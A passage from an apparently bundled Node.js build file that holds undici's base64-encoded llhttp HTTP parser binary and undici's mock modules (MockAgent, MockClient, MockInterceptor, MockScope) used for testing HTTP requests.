b25zZSBzdGF0dXMASW52YWxpZCBjaGFyYWN0ZXIgaW4gY2h1bmsgZXh0ZW5zaW9ucwBVc2VyIGNhbGxiYWNrIGVycm9yAGBvbl9yZXNldGAgY2FsbGJhY2sgZXJyb3IAYG9uX2NodW5rX2hlYWRlcmAgY2FsbGJhY2sgZXJyb3IAYG9uX21lc3NhZ2VfYmVnaW5gIGNhbGxiYWNrIGVycm9yAGBvbl9jaHVua19leHRlbnNpb25fdmFsdWVgIGNhbGxiYWNrIGVycm9yAGBvbl9zdGF0dXNfY29tcGxldGVgIGNhbGxiYWNrIGVycm9yAGBvbl92ZXJzaW9uX2NvbXBsZXRlYCBjYWxsYmFjayBlcnJvcgBgb25fdXJsX2NvbXBsZXRlYCBjYWxsYmFjayBlcnJvcgBgb25fY2h1bmtfY29tcGxldGVgIGNhbGxiYWNrIGVycm9yAGBvbl9oZWFkZXJfdmFsdWVfY29tcGxldGVgIGNhbGxiYWNrIGVycm9yAGBvbl9tZXNzYWdlX2NvbXBsZXRlYCBjYWxsYmFjayBlcnJvcgBgb25fbWV0aG9kX2NvbXBsZXRlYCBjYWxsYmFjayBlcnJvcgBgb25faGVhZGVyX2ZpZWxkX2NvbXBsZXRlYCBjYWxsYmFjayBlcnJvcgBgb25fY2h1bmtfZXh0ZW5zaW9uX25hbWVgIGNhbGxiYWNrIGVycm9yAFVuZXhwZWN0ZWQgY2hhciBpbiB1cmwgc2VydmVyAEludmFsaWQgaGVhZGVyIHZhbHVlIGNoYXIASW52YWxpZCBoZWFkZXIgZmllbGQgY2hhcgBTcGFuIGNhbGxiYWNrIGVycm9yIGluIG9uX3ZlcnNpb24ASW52YWxpZCBtaW5vciB2ZXJzaW9uAEludmFsaWQgbWFqb3IgdmVyc2lvbgBFeHBlY3RlZCBzcGFjZSBhZnRlciB2ZXJzaW9uAEV4cGVjdGVkIENSTEYgYWZ0ZXIgdmVyc2lvbgBJbnZhbGlkIEhUVFAgdmVyc2lvbgBJbnZhbGlkIGhlYWRlciB0b2tlbgBTcGFuIGNhbGxiYWNrIGVycm9yIGluIG9uX3VybABJbnZhbGlkIGNoYXJhY3RlcnMgaW4gdXJsAFVuZXhwZWN0ZWQgc3RhcnQgY2hhciBpbiB1cmwARG91YmxlIEAgaW4gdXJsAEVtcHR5IENvbnRlbnQtTGVuZ3RoAEludmFsaWQgY2hhcmFjdGVyIGluIENvbnRlbnQtTGVuZ3RoAER1cGxpY2F0ZSBDb250ZW50LUxlbmd0aABJbnZhbGlkIGNoYXIgaW4gdXJsIHBhdGgAQ29udGVudC1MZW5ndGggY2FuJ3QgYmUgcHJlc2VudCB3aXRoIFRyYW5zZmVyLUVuY29kaW5nAEludmFsaWQgY2hhcmFjdGVyIGluIGNodW5rIHNpemUAU3BhbiBjYWxsYmFjayBlcnJvciBpbiBvbl9oZWFkZXJfdmFsdWUAU3BhbiBjYWxsYmFjayBlcnJvciBpbiBvbl9jaHVua19leHRlbnNpb25fdmFsdWUASW52YWxpZCBjaGFyYWN0ZXIgaW4gY2h1bmsgZXh0ZW5zaW9ucyB2YWx1ZQBNaXNzaW5nIGV4cGVjdGVkIExGIGFmdGVyIGhlYWRlciB2YWx1ZQBJbnZhbGlkIGBUcmFuc2Zlci1FbmNvZGluZ2AgaGVhZGVyIHZhbHVlAEludmFsaWQgY2hhcmFjdGVyIGluIGNodW5rIGV4dGVuc2lvbnMgcXVvdGUgdmFsdWUASW52YWxpZCBjaGFyYWN0ZXIgaW4gY2h1bmsgZXh0ZW5zaW9ucyBxdW90ZWQgdmFsdWUAUGF1c2VkIGJ5IG9uX2hlYWRlcnNfY29tcGxldGUASW52YWxpZCBFT0Ygc3RhdGUAb25fcmVzZXQgcGF1c2UAb25fY2h1bmtfaGVhZGVyIHBhdXNlAG9uX21lc3NhZ2VfYmVnaW4gcGF1c2UAb25fY2h1bmtfZXh0ZW5zaW9uX3ZhbHVlIHBhdXNlAG9uX3N0YXR1c19jb21wbGV0ZSBwYXVzZQBvbl92ZXJzaW9uX2NvbXBsZXRlIHBhdXNlAG9uX3VybF9jb21wbGV0ZSBwYXVzZQBvbl9jaHVua19jb21wbGV0ZSBwYXVzZQBvbl9oZWFkZXJfdmFsdWVfY29tcGxldGUgcGF1c2UAb25fbWVzc2FnZV9jb21wbGV0ZSBwYXVzZQBvbl9tZXRob2RfY29tcGxldGUgcGF1c2UAb25faGVhZGVyX2ZpZWxkX2NvbXBsZXRlIHBhdXNlAG9uX2NodW5rX2V4dGVuc2lvbl9uYW1lIHBhdXNlAFVuZXhwZWN0ZWQgc3BhY2UgYWZ0ZXIgc3RhcnQgbGluZQBTcGFuIGNhbGxiYWNrIGVycm9yIGluIG9uX2NodW5rX2V4dGVuc2lvbl9uYW1lAEludmFsaWQgY2hhcmFjdGVyIGluIGNodW5rIGV4dGVuc2lvbnMgbmFtZQBQYXVzZSBvbiBDT05ORUNUL1VwZ3JhZGUAUGF1c2Ugb24gUFJJL1VwZ3JhZGUARXhwZWN0ZWQgSFRUUC8yIENvbm5lY3Rpb24gUHJlZmFjZQBTcGFuIGNhbGxiYWNrIGVycm9yIGluIG9uX21ldGhvZABFeHBlY3RlZCBzcGFjZSBhZnRlciBtZXRob2QAU3BhbiBjYWxsYmFjayBlcnJvciBpbiBvbl9oZWFkZXJfZmllbGQAUGF1c2VkAEludmFsaWQgd29yZCBlbmNvdW50ZXJlZABJbnZhbGlkIG1ldGhvZCBlbmNvdW50ZXJlZABVbmV4cGVjdGVkIGNoYXIgaW4gdXJsIHNjaGVtYQBSZXF1ZXN0IGhhcyBpbnZhbGlkIGBUcmFuc2Zlci1FbmNvZGluZ2AAU1dJVENIX1BST1hZAFVTRV9QUk9YWQBNS0FDVElWSVRZAFVOUFJPQ0VTU0FCTEVfRU5USVRZAENPUFkATU9WRURfUEVSTUFORU5UTFkAVE9PX0VBUkxZAE5PVElGWQBGQUlMRURfREVQRU5ERU5DWQBCQURfR0FURVdBWQBQTEFZAFBVVABDSEVDS09VVABHQVRFV0FZX1RJTUVPVVQAUkVRVUVTVF9USU1FT1VUAE5FVFdPUktfQ09OTkVDVF9USU1FT1VUAENPTk5FQ1RJT05fVElNRU9VVABMT0dJTl9USU1FT1VUAE5FVFdPUktfUkVBRF9USU1FT1VUAFBPU1QATUlTRElSRUNURURfUkVRVUVTVABDTElFTlRfQ0xPU0VEX1JFUVVFU1QAQ0xJRU5UX0NMT1NFRF9MT0FEX0JBTEFOQ0VEX1JFUVVFU1QAQkFEX1JFUVVFU1QASFRUUF9SRVFVRVNUX1NFTlRfVE9fSFRUUFNfUE9SVABSRVBPUlQASU1fQV9URUFQT1QAUkVTRVRfQ09OVEVOVABOT19DT05URU5UAFBBUlRJQUxfQ09OVEVOVABIUEVfSU5WQUxJRF9DT05TVEFOVABIUEVfQ0JfUkVTRVQAR0VUAEhQRV9TVFJJQ1QAQ09ORkxJQ1QAVEVNUE9SQVJZX1JFRElSRUNUAFBFUk1BTkVOVF9SRURJUkVDVABDT05ORUNUAE1VTFRJX1NUQVRVUwBIUEVfSU5WQUxJRF9TVEFUVVMAVE9PX01BTllfUkVRVUVTVFMARUFSTFlfSElOVFMAVU5BVkFJTEFCTEVfRk9SX0xFR0FMX1JFQVNPTlMAT1BUSU9OUwBTV0lUQ0hJTkdfUFJPVE9DT0xTAFZBUklBTlRfQUxTT19ORUdPVElBVEVTAE1VTFRJUExFX0NIT0lDRVMASU5URVJOQUxfU0VSVkVSX0VSUk9SAFdFQl9TRVJWRVJfVU5LTk9XTl9FUlJPUgBSQUlMR1VOX0VSUk9SAElERU5USVRZX1BST1ZJREVSX0FVVEhFTlRJQ0FUSU9OX0VSUk9SAFNTTF9DRVJUSUZJQ0FURV9FUlJPUgBJTlZBTElEX1hfRk9SV0FSREVEX0ZPUgBTRVRfUEFSQU1FVEVSAEdFVF9QQVJBTUVURVIASFBFX1VTRVIAU0VFX09USEVSAEhQRV9DQl9DSFVOS19IRUFERVIATUtDQUxFTkRBUgBTRVRVUABXRUJfU0VSVkVSX0lTX0RPV04AVEVBUkRPV04ASFBFX0NMT1NFRF9DT05ORUNUSU9OAEhFVVJJU1RJQ19FWFBJUkFUSU9OAERJU0NPTk5FQ1RFRF9PUEVSQVRJT04ATk9OX0FVVEhPUklUQVRJVkVfSU5GT1JNQVRJT04ASFBFX0lOVkFMSURfVkVSU0lPTgBIUEVfQ0JfTUVTU0FHRV9CRUdJTgBTSVRFX0lTX0ZST1pFTgBIUEVfSU5WQUxJRF9IRUFERVJfVE9LRU4ASU5WQUxJRF9UT0tFTgBGT1JCSURERU4ARU5IQU5DRV9ZT1VSX0NBTE0ASFBFX0lOVkFMSURfVVJMAEJMT0NLRURfQllfUEFSRU5UQUxfQ09OVFJPTABNS0NPTABBQ0wASFBFX0lOVEVSTkFMAFJFUVVFU1RfSEVBREVSX0ZJRUxEU19UT09fTEFSR0VfVU5PRkZJQ0lBTABIUEVfT0sAVU5MSU5LAFVOTE9DSwBQUkkAUkVUUllfV0lUSABIUEVfSU5WQUxJRF9DT05URU5UX0xFTkdUSABIUEVfVU5FWFBFQ1RFRF9DT05URU5UX0xFTkdUSABGTFVTSABQUk9QUEFUQ0gATS1TRUFSQ0gAVVJJX1RPT19MT05HAFBST0NFU1NJTkcATUlTQ0VMTEFORU9VU19QRVJTSVNURU5UX1dBUk5JTkcATUlTQ0VMTEFORU9VU19XQVJOSU5HAEhQRV9JTlZBTElEX1RSQU5TRkVSX0VOQ09ESU5HAEV4cGVjdGVkIENSTEYASFBFX0lOVkFMSURfQ0hVTktfU0laRQBNT1ZFAENPTlRJTlVFAEhQRV9DQl9TVEFUVVNfQ09NUExFVEUASFBFX0NCX0hFQURFUlNfQ09NUExFVEUASFBFX0NCX1ZFUlNJT05fQ09NUExFVEUASFBFX0NCX1VSTF9DT01QTEVURQBIUEVfQ0JfQ0hVTktfQ09NUExFVEUASFBFX0NCX0hFQURFUl9WQUxVRV9DT01QTEVURQBIUEVfQ0JfQ0hVTktfRVhURU5TSU9OX1ZBTFVFX0NPTVBMRVRFAEhQRV9DQl9DSFVOS19FWFRFTlNJT05fTkFNRV9DT01QTEVURQBIUEVfQ0JfTUVTU0FHRV9DT01QTEVURQBIUEVfQ0JfTUVUSE9EX0NPTVBMRVRFAEhQRV9DQl9IRUFERVJfRklFTERfQ09NUExFVEUAREVMRVRFAEhQRV9JTlZBTElEX0VPRl9TVEFURQBJTlZBTElEX1NTTF9DRVJUSUZJQ0FURQBQQVVTRQBOT19SRVNQT05TRQBVTlNVUFBPUlRFRF9NRURJQV9UWVBFAEdPTkUATk9UX0FDQ0VQVEFCTEUAU0VSVklDRV9VTkFWQUlMQUJMRQBSQU5HRV9OT1RfU0FUSVNGSUFCTEUAT1JJR0lOX0lTX1VOUkVBQ0hBQkxFAFJFU1BPTlNFX0lTX1NUQUxFAFBVUkdFAE1FUkdFAFJFUVVFU1RfSEVBREVSX0ZJRUxEU19UT09fTEFSR0UAUkVRVUVTVF9IRUFERVJfVE9PX0xBUkdFAFBBWUxPQURfVE9PX0xBUkdFAElOU1VGRklDSUVOVF9TVE9SQUdFAEhQRV9QQVVTRURfVVBHUkFERQBIUEVfUEFVU0VEX0gyX1VQR1JBREUAU09VUkNFAEFOTk9VTkNFAFRSQUNFAEhQRV9VTkVYUEVDVEVEX1NQQUNFAERFU0NSSUJFAFVOU1VCU0NSSUJFAFJFQ09SRABIUEVfSU5WQUxJRF9NRVRIT0QATk9UX0ZPVU5EAFBST1BGSU5EAFVOQklORABSRUJJTkQAVU5BVVRIT1JJWkVEAE1FVEhPRF9OT1RfQUxMT1dFRABIVFRQX1ZFUlNJT05fTk9UX1NVUFBPUlRFRABBTFJFQURZX1JFUE9SVEVEAEFDQ0VQVEVEAE5PVF9JTVBMRU1FTlRFRABMT09QX0RFVEVDVEVEAEhQRV9DUl9FWFBFQ1RFRABIUEVfTEZfRVhQRUNURUQAQ1JFQVRFRABJTV9VU0VEAEhQRV9QQVVTRUQAVElNRU9VVF9PQ0NVUkVEAFBBWU1FTlRfUkVRVUlSRUQAUFJFQ09ORElUSU9OX1JFUVVJUkVEAFBST1hZX0FVVEhFTlRJQ0FUSU9OX1JFUVVJUkVEAE5FVFdPUktfQVVUSEVOVElDQVRJT05fUkVRVUlSRUQATEVOR1RIX1JFUVVJUkVEAFNTTF9DRVJUSUZJQ0FURV9SRVFVSVJFRABVUEdSQURFX1JFUVVJUkVEAFBBR0VfRVhQSVJFRABQUkVDT05ESVRJT05fRkFJTEVEAEVYUEVDVEFUSU9OX0ZBSUxFRABSRVZBTElEQVRJT05fRkFJTEVEAFNTTF9IQU5EU0hBS0VfRkFJTEVEAExPQ0tFRABUUkFOU0ZPUk1BVElPTl9BUFBMSUVEAE5PVF9NT0RJRklFRABOT1RfRVhURU5ERUQAQkFORFdJRFRIX0xJTUlUX0VYQ0VFREVEAFNJVEVfSVNfT1ZFUkxPQURFRABIRUFEAEV4cGVjdGVkIEhUVFAvAABeEwAAJhMAADAQAADwFwAAnRMAABUSAAA5FwAA8BIAAAoQAAB1EgAArRIAAIITAABPFAAAfxAAAKAVAAAjFAAAiRIAAIsUAABNFQAA1BEAAM8UAAAQGAAAyRYAANwWAADBEQAA4BcAALsUAAB0FAAAfBUAAOUUAAAIFwAAHxAAAGUVAACjFAAAKBUAAAIVAACZFQAALBAAAIsZAABPDwAA1A4AAGoQAADOEAAAAhcAAIkOAABuEwAAHBMAAGYUAABWFwAAwRMAAM0TAABsEwAAaBcAAGYXAABfFwAAIhMAAM4PAABpDgAA2A4AAGMWAADLEwAAqg4AACgXAAAmFwAAxRMAAF0WAADoEQAAZxMAAGUTAADyFgAAcxMAAB0XAAD5FgAA8xEAAM8OAADOFQAADBIAALMRAAClEQAAYRAAADIXAAC7EwAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAgEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAgMCAgICAgAAAgIAAgIAAgICAgICAgICAgAEAAAAAAACAgICAgICAgICAgICAgICAgICAgICAgICAgAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAgICAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAIAAgICAgIAAAICAAICAAICAgICAgICAgIAAwAEAAAAAgICAgICAgICAgICAgICAgICAgICAgICAgIAAAACAgICAgICAgICAgICAgICAgICAgICAgICAgICAgACAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsb3NlZWVwLWFsaXZlAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEBAQEBAQEBAQEBAgEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQFjaHVua2VkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQABAQEBAQAAAQEAAQEAAQEBAQEBAQEBAQAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGVjdGlvbmVudC1sZW5ndGhvbnJveHktY29ubmVjdGlvbgAAAAAAAAAAAAAAAAAAAHJhbnNmZXItZW5jb2RpbmdwZ3JhZGUNCg0KDQpTTQ0KDQpUVFAvQ0UvVFNQLwAAAAAAAAAAAAAAAAECAAEDAAAAAAAAAAAAAAAAAAAAAAAABAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAAAAAAAAAAABAgABAwAAAAAAAAAAAAAAAAAAAAAAAAQBAQUBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAQEAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAAAAAABAAACAAAAAAAAAAAAAAAAAAAAAAAAAwQAAAQEBAQEBAQEBAQEBQQEBAQEBAQEBAQEBAAEAAYHBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQABAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAAAAAAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAgAAAAACAAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE5PVU5DRUVDS09VVE5FQ1RFVEVDUklCRUxVU0hFVEVBRFNFQVJDSFJHRUNUSVZJVFlMRU5EQVJWRU9USUZZUFRJT05TQ0hTRUFZU1RBVENIR0VPUkRJUkVDVE9SVFJDSFBBUkFNRVRFUlVSQ0VCU0NSSUJFQVJET1dOQUNFSU5ETktDS1VCU0NSSUJFSFRUUC9BRFRQLw==' + + +/***/ }), + +/***/ 1891: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.enumToMap = void 0; +function enumToMap(obj) { + const res = {}; + Object.keys(obj).forEach((key) => { + const value = obj[key]; + if (typeof value === 'number') { + res[key] = value; + } + }); + return res; +} +exports.enumToMap = enumToMap; +//# sourceMappingURL=utils.js.map + +/***/ }), + +/***/ 6771: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kClients } = __nccwpck_require__(2785) +const Agent = __nccwpck_require__(7890) +const { + kAgent, + kMockAgentSet, + kMockAgentGet, + kDispatches, + kIsMockActive, + kNetConnect, + kGetNetConnect, + kOptions, + kFactory +} = __nccwpck_require__(4347) +const MockClient = __nccwpck_require__(8687) +const MockPool = __nccwpck_require__(6193) +const { matchValue, buildMockOptions } = __nccwpck_require__(9323) +const { InvalidArgumentError, UndiciError } = __nccwpck_require__(8045) +const Dispatcher = __nccwpck_require__(412) +const Pluralizer = __nccwpck_require__(8891) +const PendingInterceptorsFormatter = __nccwpck_require__(6823) + +class FakeWeakRef { + constructor (value) { + this.value = value + } + + deref () { + return this.value + } +} + +class MockAgent extends Dispatcher { + constructor (opts) { + super(opts) + + this[kNetConnect] = true + this[kIsMockActive] = true + + // Instantiate Agent and encapsulate + if ((opts && opts.agent && typeof opts.agent.dispatch !== 'function')) { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + const agent = opts && opts.agent ? opts.agent : new Agent(opts) + this[kAgent] = agent + + this[kClients] = agent[kClients] + this[kOptions] = buildMockOptions(opts) + } + + get (origin) { + let dispatcher = this[kMockAgentGet](origin) + + if (!dispatcher) { + dispatcher = this[kFactory](origin) + this[kMockAgentSet](origin, dispatcher) + } + return dispatcher + } + + dispatch (opts, handler) { + // Call MockAgent.get to perform additional setup before dispatching as normal + this.get(opts.origin) + return this[kAgent].dispatch(opts, handler) + } + + async close () { + await this[kAgent].close() + this[kClients].clear() + } + + deactivate () { + this[kIsMockActive] = false + } + + activate () { + this[kIsMockActive] = true + } + + enableNetConnect (matcher) { + if (typeof matcher === 'string' || typeof matcher === 'function' || matcher instanceof RegExp) { + if (Array.isArray(this[kNetConnect])) { + this[kNetConnect].push(matcher) + } else { + this[kNetConnect] = [matcher] + } + } else if (typeof matcher === 'undefined') { + this[kNetConnect] = true + } else { + throw new InvalidArgumentError('Unsupported matcher. Must be one of String|Function|RegExp.') + } + } + + disableNetConnect () { + this[kNetConnect] = false + } + + // This is required to bypass issues caused by using global symbols - see: + // https://github.com/nodejs/undici/issues/1447 + get isMockActive () { + return this[kIsMockActive] + } + + [kMockAgentSet] (origin, dispatcher) { + this[kClients].set(origin, new FakeWeakRef(dispatcher)) + } + + [kFactory] (origin) { + const mockOptions = Object.assign({ agent: this }, this[kOptions]) + return this[kOptions] && this[kOptions].connections === 1 + ? new MockClient(origin, mockOptions) + : new MockPool(origin, mockOptions) + } + + [kMockAgentGet] (origin) { + // First check if we can immediately find it + const ref = this[kClients].get(origin) + if (ref) { + return ref.deref() + } + + // If the origin is not a string create a dummy parent pool and return to user + if (typeof origin !== 'string') { + const dispatcher = this[kFactory]('http://localhost:9999') + this[kMockAgentSet](origin, dispatcher) + return dispatcher + } + + // If we match, create a pool and assign the same dispatches + for (const [keyMatcher, nonExplicitRef] of Array.from(this[kClients])) { + const nonExplicitDispatcher = nonExplicitRef.deref() + if (nonExplicitDispatcher && typeof keyMatcher !== 'string' && matchValue(keyMatcher, origin)) { + const dispatcher = this[kFactory](origin) + this[kMockAgentSet](origin, dispatcher) + dispatcher[kDispatches] = nonExplicitDispatcher[kDispatches] + return dispatcher + } + } + } + + [kGetNetConnect] () { + return this[kNetConnect] + } + + pendingInterceptors () { + const mockAgentClients = this[kClients] + + return Array.from(mockAgentClients.entries()) + .flatMap(([origin, scope]) => scope.deref()[kDispatches].map(dispatch => ({ ...dispatch, origin }))) + .filter(({ pending }) => pending) + } + + assertNoPendingInterceptors ({ pendingInterceptorsFormatter = new PendingInterceptorsFormatter() } = {}) { + const pending = this.pendingInterceptors() + + if (pending.length === 0) { + return + } + + const pluralizer = new Pluralizer('interceptor', 'interceptors').pluralize(pending.length) + + throw new UndiciError(` +${pluralizer.count} ${pluralizer.noun} ${pluralizer.is} pending: + +${pendingInterceptorsFormatter.format(pending)} +`.trim()) + } +} + +module.exports = MockAgent + + +/***/ }), + +/***/ 8687: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { promisify } = __nccwpck_require__(3837) +const Client = __nccwpck_require__(3598) +const { buildMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kMockAgent, + kClose, + kOriginalClose, + kOrigin, + kOriginalDispatch, + kConnected +} = __nccwpck_require__(4347) +const { MockInterceptor } = __nccwpck_require__(410) +const Symbols = __nccwpck_require__(2785) +const { InvalidArgumentError } = __nccwpck_require__(8045) + +/** + * MockClient provides an API that extends the Client to influence the mockDispatches. + */ +class MockClient extends Client { + constructor (origin, opts) { + super(origin, opts) + + if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + + this[kMockAgent] = opts.agent + this[kOrigin] = origin + this[kDispatches] = [] + this[kConnected] = 1 + this[kOriginalDispatch] = this.dispatch + this[kOriginalClose] = this.close.bind(this) + + this.dispatch = buildMockDispatch.call(this) + this.close = this[kClose] + } + + get [Symbols.kConnected] () { + return this[kConnected] + } + + /** + * Sets up the base interceptor for mocking replies from undici. + */ + intercept (opts) { + return new MockInterceptor(opts, this[kDispatches]) + } + + async [kClose] () { + await promisify(this[kOriginalClose])() + this[kConnected] = 0 + this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) + } +} + +module.exports = MockClient + + +/***/ }), + +/***/ 888: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { UndiciError } = __nccwpck_require__(8045) + +class MockNotMatchedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, MockNotMatchedError) + this.name = 'MockNotMatchedError' + this.message = message || 'The request does not match any registered mock dispatches' + this.code = 'UND_MOCK_ERR_MOCK_NOT_MATCHED' + } +} + +module.exports = { + MockNotMatchedError +} + + +/***/ }), + +/***/ 410: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { getResponseData, buildKey, addMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kDispatchKey, + kDefaultHeaders, + kDefaultTrailers, + kContentLength, + kMockDispatch +} = __nccwpck_require__(4347) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { buildURL } = __nccwpck_require__(3983) + +/** + * Defines the scope API for an interceptor reply + */ +class MockScope { + constructor (mockDispatch) { + this[kMockDispatch] = mockDispatch + } + + /** + * Delay a reply by a set amount in ms. + */ + delay (waitInMs) { + if (typeof waitInMs !== 'number' || !Number.isInteger(waitInMs) || waitInMs <= 0) { + throw new InvalidArgumentError('waitInMs must be a valid integer > 0') + } + + this[kMockDispatch].delay = waitInMs + return this + } + + /** + * For a defined reply, never mark as consumed. + */ + persist () { + 